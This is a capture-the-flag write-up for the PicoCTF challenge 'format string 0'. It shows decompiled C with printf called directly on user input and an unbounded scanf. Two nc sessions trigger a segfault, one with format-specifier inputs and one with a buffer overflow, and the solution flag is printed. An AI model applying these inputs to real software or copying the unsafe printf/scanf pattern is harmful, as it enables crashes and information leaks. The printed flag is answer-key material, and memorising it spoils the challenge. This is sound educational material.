PicoCTF Writeup - format string 0#

PicoCTF Challenge: https://play.picoctf.org/practice/challenge/433?category=6&page=1

format string 0#
Author: Cheng Zhang
Description#
Can you use your knowledge of format strings to make the customers happy?
Download the binary here.
Download the source here.
Additional details will be available after launching your challenge instance.
Hints#
1st - This is an introduction of format string vulnerabilities. Look up “format specifiers” if you have never seen them before.
2nd - Just try out the different options
Resources:#
Source Code: /format-string-0.c
Binary: /format-string-0

1
$ nc mimas.picoctf.net 60589

There are two different methods to solve this challenge.

Decompile#

We can decompile the binary to a pseudo C like this (Binary Ninja):

1
00401276    void sigsegv_handler() __noreturn
2

3
00401276    {
4
00401294        printf("\n%s\n", &flag);
5
004012a3        fflush(stdout);
6
004012ad        exit(1);
7
004012ad        /* no return */
8
00401276    }
9

10
/* ... */
11

12
004012b2    int on_menu(char* user_input, char** menu_item, int list_size)
13

14
004012b2    {
15
004012b2        int index = 0;
16
004012b2
17
0040130d        while (true)
18
0040130d        {
19
0040130d            if (index >= list_size)
20
0040130f                return 0;
21
0040130f
22
004012fa            /* Compares each characters */
23
004012fa            if (!strcmp(user_input, menu_item[index]))
24
004012fa                break;
25
004012fa
26
00401303            index += 1;
27
0040130d        }
28
0040130d
29
004012fc        return 1;
30
004012b2    }
31

32
/* ... */
33

34
004014c3    int serve_bob()
35

36
004014c3    {
37
004014c3        printf("\n%s %s\n%s %s\n%s %s\n%s", "Good job! Patrick is happy!",
38
004014c3            "Now can you serve the second customer?", "Sponge Bob wants something outrageous that would break the shop",
39
004014c3            "(better be served quick before the shop owner kicks you out!)", "Please choose from the following burgers:",
40
004014c3            "Pe%to_Portobello, $outhwest_Burger, Cla%sic_Che%s%steak", "Enter your recommendation: ");
41
00401511        fflush(stdout);
42

43
00401527        char format[32];
44
00401527        scanf("%s", &format);
45

46
0040152c        char *items[] = {
47
                    "Pe%to_Portobello",
48
                    "$outhwest_Burger",
49
                    "Cla%sic_Che%s%steak"
50
                };
51

52
0040153c
53
0040155e        if (!on_menu(&format, &itmes, 3))
54
0040155e        {
55
00401587            printf("There is no such burger yet!");
56
00401574            return fflush(stdout);
57
0040155e        }
58
0040155e
59
00401587        printf(&format);
60
00401596        return fflush(stdout);
61
004014c3    }
62

63

64
/* ... */
65

66
004013bb    int serve_patrick()
67

68
004013bb    {
69
004013bb        printf("%s %s\n%s\n%s %s\n%s", "Welcome to our newly-opened burger place Pico 'n Patty!",
70
004013bb            "Can you help the picky customers find their favorite burger?", "Here comes the first customer Patrick who wants a giant bite.",
71
004013bb            "Please choose from the following burgers:", "Breakf@st_Burger, Gr%114d_Cheese, Bac0n_D3luxe",
72
004013bb            "Enter your recommendation: ");
73
00401408        fflush(stdout);
74

75
0040141e        char format[44];
76
0040141e        scanf("%s", &format);
77

78
00401423        char *items[] = {
79
                    "Breakf@st_Burger",
80
                    "Gr%114d_Cheese",
81
                    "Bac0n_D3luxe"
82
                };
83

84
00401433
85
00401455        if (!on_menu(&format, &items, 3))
86
00401455        {
87
0040147e            printf("There is no such burger yet!");
88
0040146b            return fflush(stdout);
89
00401455        }
90
00401455
91
0040148a        if (printf(&format) > 0x40)
92
004014ac            return serve_bob();
93
004014ac
94
004014ac        printf("%s\n%s\n", "Patrick is still hungry!", "Try to serve him something of larger size!");
95
004014bb        return fflush(stdout);
96
004013bb    }
97

98
/* ... */
99

100
00401316    int main()
101

102
00401316    {
103
00401333        FILE* fp = fopen("flag.txt", "r");
104
00401333
105
00401341        if (!fp)
106
00401341        {
107
00401377            printf("%s %s", "Please create 'flag.txt' in this directory with your", "own debugging flag.\n");
108
00401361            exit(0);
109
00401361            /* no return */
110
00401341        }
111
00401341
112
00401377        fgets(&flag, 64, fp);
113
00401386        signal(SIGSEGV, sigsegv_handler);
114
0040138b        gid_t gid = getegid();
115
004013a5        setresgid(gid, gid, gid);
116
004013af        serve_patrick();
117
004013ba        return 0;
118
00401316    }

This is the full source code (decompiled):

1
void sigsegv_handler()
2
{
3
    printf("\n%s\n", &flag);
4
    fflush(stdout);
5
    exit(1);
6
}
7

8
int serve_bob()
9
{
10
    printf("\n%s %s\n%s %s\n%s %s\n%s", "Good job! Patrick is happy!",
11
        "Now can you serve the second customer?", "Sponge Bob wants something outrageous that would break the shop",
12
        "(better be served quick before the shop owner kicks you out!)", "Please choose from the following burgers:",
13
        "Pe%to_Portobello, $outhwest_Burger, Cla%sic_Che%s%steak", "Enter your recommendation: ");
14
    fflush(stdout);
15

16
    char format[32];
17
    scanf("%s", &format);
18

19
    char *items[] = {
20
        "Pe%to_Portobello",
21
        "$outhwest_Burger",
22
        "Cla%sic_Che%s%steak"
23
    };
24

25

26
    if (!on_menu(&format, &itmes, 3))
27
    {
28
        printf("There is no such burger yet!");
29
        return fflush(stdout);
30
    }
31

32
    printf(&format);
33
    return fflush(stdout);
34
}
35

36
int serve_patrick()
37
{
38
    printf("%s %s\n%s\n%s %s\n%s", "Welcome to our newly-opened burger place Pico 'n Patty!",
39
        "Can you help the picky customers find their favorite burger?", "Here comes the first customer Patrick who wants a giant bite.",
40
        "Please choose from the following burgers:", "Breakf@st_Burger, Gr%114d_Cheese, Bac0n_D3luxe",
41
        "Enter your recommendation: ");
42
    fflush(stdout);
43

44
    char format[44];
45
    scanf("%s", &format);
46

47
    char *items[] = {
48
        "Breakf@st_Burger",
49
        "Gr%114d_Cheese",
50
        "Bac0n_D3luxe"
51
    };
52

53

54
    if (!on_menu(&format, &items, 3))
55
    {
56
        printf("There is no such burger yet!");
57
        return fflush(stdout);
58
    }
59

60
    if (printf(&format) > 0x40)
61
        return serve_bob();
62

63
    printf("%s\n%s\n", "Patrick is still hungry!", "Try to serve him something of larger size!");
64
    return fflush(stdout);
65
}
66

67
int main()
68
{
69
    FILE* fp = fopen("flag.txt", "r");
70

71
    if (!fp)
72
    {
73
        printf("%s %s", "Please create 'flag.txt' in this directory with your", "own debugging flag.\n");
74
        exit(0);
75
    }
76

77
    fgets(&flag, 64, fp);
78

79
    signal(SIGSEGV, sigsegv_handler);
80

81
    gid_t gid = getegid();
82
    setresgid(gid, gid, gid);
83

84
    serve_patrick();
85
    return 0;
86
}

Analysis#

A close inspection of the program’s decompiled code reveals that special characters with % are printed in printf(). By selecting an appropriate format string as input, you can have that format string printed and cause a segmentation fault.

The string Gr%114d_Cheese prints a specific number of spaces on the screen, followed by additional strings. The code below calls serve_bob() if the number of characters printed by printf exceeds 64.

1
if (printf(&format) > 0x40) /* 0x40 => 64 */
2
    return serve_bob();

The string Cla%sic_Che%s%steak calls %s a total of 3 times. In the printf() statement containing this string, %s is called 6 times in total to print the string. By attempting to call 3 additional non-existent strings, a segmentation fault is triggered.

1
therustymate-picoctf@webshell:~$ nc mimas.picoctf.net 60589
2
Welcome to our newly-opened burger place Pico 'n Patty! Can you help the picky customers find their favorite burger?
3
Here comes the first customer Patrick who wants a giant bite.
4
Please choose from the following burgers: Breakf@st_Burger, Gr%114d_Cheese, Bac0n_D3luxe
5
Enter your recommendation: Gr%114d_Cheese
6
Gr                                                                                                           4202954_Cheese
7
Good job! Patrick is happy! Now can you serve the second customer?
8
Sponge Bob wants something outrageous that would break the shop (better be served quick before the shop owner kicks you out!)
9
Please choose from the following burgers: Pe%to_Portobello, $outhwest_Burger, Cla%sic_Che%s%steak
10
Enter your recommendation: Cla%sic_Che%s%steak
11
ClaCla%sic_Che%s%steakic_Che(null)
12
picoCTF{7h3_cu570m3r_15_n3v3r_SEGFAULT_f89c1405}
13

14
therustymate-picoctf@webshell:~$

The flag is: picoCTF{7h3_cu570m3r_15_n3v3r_SEGFAULT_f89c1405}

This program has a system that reads the flag from flag.txt and outputs it if a segmentation fault occurs. Therefore, you can obtain the flag by causing a segmentation fault in the program.

The program takes input via scanf() into a 44-byte or 32-byte variable without size validation, so entering a value exceeding this limit triggers a segmentation fault and causes the flag to be printed.

1
therustymate-picoctf@webshell:~$ nc mimas.picoctf.net 60589
2
Welcome to our newly-opened burger place Pico 'n Patty! Can you help the picky customers find their favorite burger?
3
Here comes the first customer Patrick who wants a giant bite.
4
Please choose from the following burgers: Breakf@st_Burger, Gr%114d_Cheese, Bac0n_D3luxe
5
Enter your recommendation: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
6
There is no such burger yet!
7

8
picoCTF{7h3_cu570m3r_15_n3v3r_SEGFAULT_f89c1405}

The flag is: picoCTF{7h3_cu570m3r_15_n3v3r_SEGFAULT_f89c1405}